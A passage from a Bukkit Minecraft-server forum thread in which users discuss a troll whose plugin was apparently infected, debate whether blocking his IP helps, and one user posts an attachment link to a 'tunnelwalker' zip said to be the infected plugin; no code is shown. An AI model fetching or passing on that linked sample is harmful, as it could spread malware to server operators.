    The original mod is gone, but this troll guy needs his ip address blocked from accessing bukkit. I've got his ip.
     
  27. Offline

    andrewpo

    What good would that do? Any technically competent individual can operate proxy servers to bypass IP address blocks, they may even have a dynamic IP address.

    For all you know, they may have been 'hacking' servers through a socks proxy.
     
  28. Offline

    TheBeast808

    Any way you could posts/send me the plugin that was infected?
     
  29. Offline

    pcgirl

    I have uploaded this twice now. I don't have it here at work. How do I get it to people if the upload file link below isn't working?

    The original jar is no longer on bukkit. It's been deleted - probably by him and he's probably reading this as we "speak"..

    http://forums.bukkit.org/attachments/tunnelwalker-zip.10077/

    EDIT by Moderator: merged posts, please use the edit button instead of double posting.
     
    Last edited by a moderator: May 26, 2016
  30. Offline

    TheBeast808

Thread Status:
Not open for further replies.

Share This Page